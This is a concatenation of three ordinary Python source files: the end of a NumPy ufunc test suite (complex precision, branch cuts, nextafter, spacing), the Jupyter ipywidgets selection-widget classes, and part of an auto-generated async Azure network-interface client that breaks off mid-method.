check(x_basic, 2*eps/1e-3)
# Check a few points
z = np.array([1e-5*(1+1j)], dtype=dtype)
p = 9.999999999333333333e-6 + 1.000000000066666666e-5j
d = np.absolute(1-np.arctanh(z)/p)
assert np.all(d < 1e-15)
p = 1.0000000000333333333e-5 + 9.999999999666666667e-6j
d = np.absolute(1-np.arcsinh(z)/p)
assert np.all(d < 1e-15)
p = 9.999999999333333333e-6j + 1.000000000066666666e-5
d = np.absolute(1-np.arctan(z)/p)
assert np.all(d < 1e-15)
p = 1.0000000000333333333e-5j + 9.999999999666666667e-6
d = np.absolute(1-np.arcsin(z)/p)
assert np.all(d < 1e-15)
# Check continuity across switchover points
def check(func, z0, d=1):
z0 = np.asarray(z0, dtype=dtype)
zp = z0 + abs(z0) * d * eps * 2
zm = z0 - abs(z0) * d * eps * 2
assert np.all(zp != zm), (zp, zm)
# NB: the cancellation error at the switchover is at least eps
good = (abs(func(zp) - func(zm)) < 2*eps)
assert np.all(good), (func, z0[~good])
for func in (np.arcsinh,np.arcsinh,np.arcsin,np.arctanh,np.arctan):
pts = [rp+1j*ip for rp in (-1e-3,0,1e-3) for ip in(-1e-3,0,1e-3)
if rp != 0 or ip != 0]
check(func, pts, 1)
check(func, pts, 1j)
check(func, pts, 1+1j)
def test_loss_of_precision(self):
for dtype in [np.complex64, np.complex_]:
yield self.check_loss_of_precision, dtype
@dec.knownfailureif(is_longdouble_finfo_bogus(), "Bogus long double finfo")
def test_loss_of_precision_longcomplex(self):
self.check_loss_of_precision(np.longcomplex)
class TestAttributes(TestCase):
def test_attributes(self):
add = ncu.add
assert_equal(add.__name__, 'add')
assert add.__doc__.startswith('add(x1, x2[, out])\n\n')
self.assertTrue(add.ntypes >= 18) # don't fail if types added
self.assertTrue('ii->i' in add.types)
assert_equal(add.nin, 2)
assert_equal(add.nout, 1)
assert_equal(add.identity, 0)
class TestSubclass(TestCase):
def test_subclass_op(self):
class simple(np.ndarray):
def __new__(subtype, shape):
self = np.ndarray.__new__(subtype, shape, dtype=object)
self.fill(0)
return self
a = simple((3,4))
assert_equal(a+a, a)
def _check_branch_cut(f, x0, dx, re_sign=1, im_sign=-1, sig_zero_ok=False,
dtype=np.complex):
"""
Check for a branch cut in a function.
Assert that `x0` lies on a branch cut of function `f` and `f` is
continuous from the direction `dx`.
Parameters
----------
f : func
Function to check
x0 : array-like
Point on branch cut
dx : array-like
Direction to check continuity in
re_sign, im_sign : {1, -1}
Change of sign of the real or imaginary part expected
sig_zero_ok : bool
Whether to check if the branch cut respects signed zero (if applicable)
dtype : dtype
Dtype to check (should be complex)
"""
x0 = np.atleast_1d(x0).astype(dtype)
dx = np.atleast_1d(dx).astype(dtype)
scale = np.finfo(dtype).eps * 1e3
atol = 1e-4
y0 = f(x0)
yp = f(x0 + dx*scale*np.absolute(x0)/np.absolute(dx))
ym = f(x0 - dx*scale*np.absolute(x0)/np.absolute(dx))
assert np.all(np.absolute(y0.real - yp.real) < atol), (y0, yp)
assert np.all(np.absolute(y0.imag - yp.imag) < atol), (y0, yp)
assert np.all(np.absolute(y0.real - ym.real*re_sign) < atol), (y0, ym)
assert np.all(np.absolute(y0.imag - ym.imag*im_sign) < atol), (y0, ym)
if sig_zero_ok:
# check that signed zeros also work as a displacement
jr = (x0.real == 0) & (dx.real != 0)
ji = (x0.imag == 0) & (dx.imag != 0)
x = -x0
x.real[jr] = 0.*dx.real
x.imag[ji] = 0.*dx.imag
x = -x
ym = f(x)
ym = ym[jr | ji]
y0 = y0[jr | ji]
assert np.all(np.absolute(y0.real - ym.real*re_sign) < atol), (y0, ym)
assert np.all(np.absolute(y0.imag - ym.imag*im_sign) < atol), (y0, ym)
def test_copysign():
assert np.copysign(1, -1) == -1
old_err = np.seterr(divide="ignore")
try:
assert 1 / np.copysign(0, -1) < 0
assert 1 / np.copysign(0, 1) > 0
finally:
np.seterr(**old_err)
assert np.signbit(np.copysign(np.nan, -1))
assert not np.signbit(np.copysign(np.nan, 1))
def _test_nextafter(t):
one = t(1)
two = t(2)
zero = t(0)
eps = np.finfo(t).eps
assert np.nextafter(one, two) - one == eps
assert np.nextafter(one, zero) - one < 0
assert np.isnan(np.nextafter(np.nan, one))
assert np.isnan(np.nextafter(one, np.nan))
assert np.nextafter(one, one) == one
def test_nextafter():
return _test_nextafter(np.float64)
def test_nextafterf():
return _test_nextafter(np.float32)
@dec.knownfailureif(sys.platform == 'win32' or
("powerpc" in platform.processor()),
"Long double support buggy on win32 and PPC.")
def test_nextafterl():
return _test_nextafter(np.longdouble)
def _test_spacing(t):
err = np.seterr(invalid='ignore')
one = t(1)
eps = np.finfo(t).eps
nan = t(np.nan)
inf = t(np.inf)
try:
assert np.spacing(one) == eps
assert np.isnan(np.spacing(nan))
assert np.isnan(np.spacing(inf))
assert np.isnan(np.spacing(-inf))
assert np.spacing(t(1e30)) != 0
finally:
np.seterr(**err)
def test_spacing():
return _test_spacing(np.float64)
def test_spacingf():
return _test_spacing(np.float32)
@dec.knownfailureif(sys.platform == 'win32' or
("powerpc" in platform.processor()),
"Long double support buggy on win32 and PPC.")
def test_spacingl():
return _test_spacing(np.longdouble)
def test_spacing_gfortran():
# Reference from this fortran file, built with gfortran 4.3.3 on linux
# 32bits:
# PROGRAM test_spacing
# INTEGER, PARAMETER :: SGL = SELECTED_REAL_KIND(p=6, r=37)
# INTEGER, PARAMETER :: DBL = SELECTED_REAL_KIND(p=13, r=200)
#
# WRITE(*,*) spacing(0.00001_DBL)
# WRITE(*,*) spacing(1.0_DBL)
# WRITE(*,*) spacing(1000._DBL)
# WRITE(*,*) spacing(10500._DBL)
#
# WRITE(*,*) spacing(0.00001_SGL)
# WRITE(*,*) spacing(1.0_SGL)
# WRITE(*,*) spacing(1000._SGL)
# WRITE(*,*) spacing(10500._SGL)
# END PROGRAM
ref = {}
ref[np.float64] = [1.69406589450860068E-021,
2.22044604925031308E-016,
1.13686837721616030E-013,
1.81898940354585648E-012]
ref[np.float32] = [
9.09494702E-13,
1.19209290E-07,
6.10351563E-05,
9.76562500E-04]
for dt, dec in zip([np.float32, np.float64], (10, 20)):
x = np.array([1e-5, 1, 1000, 10500], dtype=dt)
assert_array_almost_equal(np.spacing(x), ref[dt], decimal=dec)
def test_nextafter_vs_spacing():
# XXX: spacing does not handle long double yet
for t in [np.float32, np.float64]:
for _f in [1, 1e-5, 1000]:
f = t(_f)
f1 = t(_f + 1)
assert np.nextafter(f, f1) - f == np.spacing(f)
def test_pos_nan():
"""Check np.nan is a positive nan."""
assert np.signbit(np.nan) == 0
def test_reduceat():
"""Test bug in reduceat when structured arrays are not copied."""
db = np.dtype([('name', 'S11'),('time', np.int64), ('value', np.float32)])
a = np.empty([100], dtype=db)
a['name'] = 'Simple'
a['time'] = 10
a['value'] = 100
indx = [0,7,15,25]
h2 = []
val1 = indx[0]
for val2 in indx[1:]:
h2.append(np.add.reduce(a['value'][val1:val2]))
val1 = val2
h2.append(np.add.reduce(a['value'][val1:]))
h2 = np.array(h2)
# test buffered -- this should work
h1 = np.add.reduceat(a['value'], indx)
assert_array_almost_equal(h1, h2)
# This is when the error occurs.
# test no buffer
res = np.setbufsize(32)
h1 = np.add.reduceat(a['value'], indx)
np.setbufsize(np.UFUNC_BUFSIZE_DEFAULT)
assert_array_almost_equal(h1, h2)
def test_complex_nan_comparisons():
nans = [complex(np.nan, 0), complex(0, np.nan), complex(np.nan, np.nan)]
fins = [complex(1, 0), complex(-1, 0), complex(0, 1), complex(0, -1),
complex(1, 1), complex(-1, -1), complex(0, 0)]
for x in nans + fins:
x = np.array([x])
for y in nans + fins:
y = np.array([y])
if np.isfinite(x) and np.isfinite(y):
continue
assert_equal(x < y, False, err_msg="%r < %r" % (x, y))
assert_equal(x > y, False, err_msg="%r > %r" % (x, y))
assert_equal(x <= y, False, err_msg="%r <= %r" % (x, y))
assert_equal(x >= y, False, err_msg="%r >= %r" % (x, y))
assert_equal(x == y, False, err_msg="%r == %r" % (x, y))
if __name__ == "__main__":
run_module_suite()
|
|
"""Selection classes.
Represents an enumeration using a widget.
"""
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
from collections import OrderedDict
from .domwidget import DOMWidget
from .widget import register
from traitlets import (Unicode, Bool, Any, Dict, TraitError, CaselessStrEnum,
Tuple, List, Union, observe, validate)
from ipython_genutils.py3compat import unicode_type
def _value_to_label(value, obj):
options = obj._make_options(obj.options)
return next((k for k, v in options if obj.equals(v, value)), '')
def _label_to_value(k, obj):
return obj._options_dict[k]
class _Selection(DOMWidget):
"""Base class for Selection widgets
``options`` can be specified as a list or dict. If given as a list,
it will be transformed to a dict of the form ``{unicode_type(value): value}``.
When programmatically setting the value, a reverse lookup is performed
among the options to check that the value is valid. The reverse lookup uses
the equality operator by default, but another predicate may be provided via
the ``equals`` keyword argument. For example, when dealing with numpy arrays,
one may set equals=np.array_equal.
"""
value = Any(help="Selected value").tag(sync=True,
to_json=_value_to_label,
from_json=_label_to_value)
options = Union([List(), Dict()],
help="""List of (key, value) tuples or dict of values that the user can select.
The keys of this list are the strings that will be displayed in the UI,
representing the actual Python choices.
The keys of this list are also available as _options_labels.
""")
_options_dict = Dict(read_only=True)
_options_labels = Tuple(read_only=True).tag(sync=True)
_options_values = Tuple(read_only=True)
_model_module = Unicode('jupyter-js-widgets').tag(sync=True)
_view_module = Unicode('jupyter-js-widgets').tag(sync=True)
disabled = Bool(help="Enable or disable user changes").tag(sync=True)
description = Unicode(help="Description of the value this widget represents").tag(sync=True)
def __init__(self, *args, **kwargs):
self.equals = kwargs.pop('equals', lambda x, y: x == y)
super(_Selection, self).__init__(*args, **kwargs)
def _make_options(self, x):
# Return a list of key-value pairs where the keys are strings
# If x is a dict, convert it to list format.
if isinstance(x, (OrderedDict, dict)):
return [(unicode_type(k), v) for k, v in x.items()]
# If x is an ordinary list, use the option values as names.
for y in x:
if not isinstance(y, (list, tuple)) or len(y) < 2:
return [(unicode_type(i), i) for i in x]
# Value is already in the correct format.
return x
@validate('options')
def _validate_options(self, proposal):
"""Handles when the options tuple has been changed.
Setting options implies setting option labels from the keys of the dict.
"""
new = proposal['value']
options = self._make_options(new)
self.set_trait('_options_dict', { i[0]: i[1] for i in options })
self.set_trait('_options_labels', [ i[0] for i in options ])
self.set_trait('_options_values', [ i[1] for i in options ])
self._value_in_options()
return new
def _value_in_options(self):
# ensure that the chosen value is one of the choices
if self._options_values:
if self.value not in self._options_values:
self.value = next(iter(self._options_values))
@validate('value')
def _validate_value(self, proposal):
value = proposal['value']
if _value_to_label(value, self):
return value
else:
raise TraitError('Invalid selection')
def _values_to_labels(values, obj):
return tuple(_value_to_label(v, obj) for v in values)
def _labels_to_values(k, obj):
return tuple(_label_to_value(l, obj) for l in k)
class _MultipleSelection(_Selection):
"""Base class for MultipleSelection widgets.
As with ``_Selection``, ``options`` can be specified as a list or dict. If
given as a list, it will be transformed to a dict of the form
``{unicode_type(value): value}``.
Despite its name, the ``value`` attribute is a tuple, even if only a single
option is selected.
"""
value = Tuple(help="Selected values").tag(sync=True,
to_json=_values_to_labels, from_json=_labels_to_values)
def _value_in_options(self):
new_value = []
for v in self.value:
if v in self._options_dict.values():
new_value.append(v)
self.value = new_value
@validate('value')
def _validate_value(self, proposal):
value = proposal['value']
if all(_value_to_label(v, self) for v in value):
return value
else:
raise TraitError('Invalid selection')
@register('Jupyter.ToggleButtons')
class ToggleButtons(_Selection):
"""Group of toggle buttons that represent an enumeration.
Only one toggle button can be toggled at any point in time.
"""
_view_name = Unicode('ToggleButtonsView').tag(sync=True)
_model_name = Unicode('ToggleButtonsModel').tag(sync=True)
tooltips = List(Unicode()).tag(sync=True)
icons = List(Unicode()).tag(sync=True)
button_style = CaselessStrEnum(
values=['primary', 'success', 'info', 'warning', 'danger', ''],
default_value='', allow_none=True, help="""Use a predefined styling for
the buttons.""").tag(sync=True)
@register('Jupyter.Dropdown')
class Dropdown(_Selection):
"""Allows you to select a single item from a dropdown."""
_view_name = Unicode('DropdownView').tag(sync=True)
_model_name = Unicode('DropdownModel').tag(sync=True)
button_style = CaselessStrEnum(
values=['primary', 'success', 'info', 'warning', 'danger', ''],
default_value='', allow_none=True, help="""Use a predefined styling for
the buttons.""").tag(sync=True)
@register('Jupyter.RadioButtons')
class RadioButtons(_Selection):
"""Group of radio buttons that represent an enumeration.
Only one radio button can be toggled at any point in time.
"""
_view_name = Unicode('RadioButtonsView').tag(sync=True)
_model_name = Unicode('RadioButtonsModel').tag(sync=True)
@register('Jupyter.Select')
class Select(_Selection):
"""Listbox that only allows one item to be selected at any given time."""
_view_name = Unicode('SelectView').tag(sync=True)
_model_name = Unicode('SelectModel').tag(sync=True)
@register('Jupyter.SelectionSlider')
class SelectionSlider(_Selection):
"""Slider to select a single item from a list or dictionary."""
_view_name = Unicode('SelectionSliderView').tag(sync=True)
_model_name = Unicode('SelectionSliderModel').tag(sync=True)
orientation = CaselessStrEnum(
values=['horizontal', 'vertical'], default_value='horizontal',
allow_none=False, help="Vertical or horizontal.").tag(sync=True)
readout = Bool(True,
help="Display the current selected label next to the slider").tag(sync=True)
continuous_update = Bool(True,
help="Update the value of the widget as the user is holding the slider.").tag(sync=True)
@register('Jupyter.SelectMultiple')
class SelectMultiple(_MultipleSelection):
"""Listbox that allows many items to be selected at any given time.
Despite their names, inherited from ``_Selection``, the currently chosen
option values, ``value``, or their labels, ``selected_labels`` must both be
updated with a list-like object.
"""
_view_name = Unicode('SelectMultipleView').tag(sync=True)
_model_name = Unicode('SelectMultipleModel').tag(sync=True)
|
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class NetworkInterfacesOperations:
"""NetworkInterfacesOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2019_07_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def _delete_initial(
self,
resource_group_name: str,
network_interface_name: str,
**kwargs: Any
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-07-01"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'} # type: ignore
async def begin_delete(
self,
resource_group_name: str,
network_interface_name: str,
**kwargs: Any
) -> AsyncLROPoller[None]:
"""Deletes the specified network interface.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._delete_initial(
resource_group_name=resource_group_name,
network_interface_name=network_interface_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'} # type: ignore
async def get(
self,
resource_group_name: str,
network_interface_name: str,
expand: Optional[str] = None,
**kwargs: Any
) -> "_models.NetworkInterface":
"""Gets information about the specified network interface.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:param expand: Expands referenced resources.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: NetworkInterface, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2019_07_01.models.NetworkInterface
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkInterface"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-07-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('NetworkInterface', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'} # type: ignore
async def _create_or_update_initial(
self,
resource_group_name: str,
network_interface_name: str,
parameters: "_models.NetworkInterface",
**kwargs: Any
) -> "_models.NetworkInterface":
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkInterface"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-07-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'NetworkInterface')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('NetworkInterface', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('NetworkInterface', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'} # type: ignore
async def begin_create_or_update(
self,
resource_group_name: str,
network_interface_name: str,
parameters: "_models.NetworkInterface",
**kwargs: Any
) -> AsyncLROPoller["_models.NetworkInterface"]:
"""Creates or updates a network interface.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:param parameters: Parameters supplied to the create or update network interface operation.
:type parameters: ~azure.mgmt.network.v2019_07_01.models.NetworkInterface
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either NetworkInterface or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.network.v2019_07_01.models.NetworkInterface]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkInterface"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._create_or_update_initial(
resource_group_name=resource_group_name,
network_interface_name=network_interface_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('NetworkInterface', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'} # type: ignore
async def _update_tags_initial(
self,
resource_group_name: str,
network_interface_name: str,
parameters: "_models.TagsObject",
**kwargs: Any
) -> "_models.NetworkInterface":
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkInterface"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-07-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._update_tags_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'TagsObject')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('NetworkInterface', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_update_tags_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'} # type: ignore
async def begin_update_tags(
self,
resource_group_name: str,
network_interface_name: str,
parameters: "_models.TagsObject",
**kwargs: Any
) -> AsyncLROPoller["_models.NetworkInterface"]:
"""Updates a network interface tags.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:param parameters: Parameters supplied to update network interface tags.
:type parameters: ~azure.mgmt.network.v2019_07_01.models.TagsObject
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either NetworkInterface or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.network.v2019_07_01.models.NetworkInterface]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkInterface"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._update_tags_initial(
resource_group_name=resource_group_name,
network_interface_name=network_interface_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('NetworkInterface', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_update_tags.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'} # type: ignore
def list_all(
self,
**kwargs: Any
) -> AsyncIterable["_models.NetworkInterfaceListResult"]:
"""Gets all network interfaces in a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either NetworkInterfaceListResult or the result of cls(response)
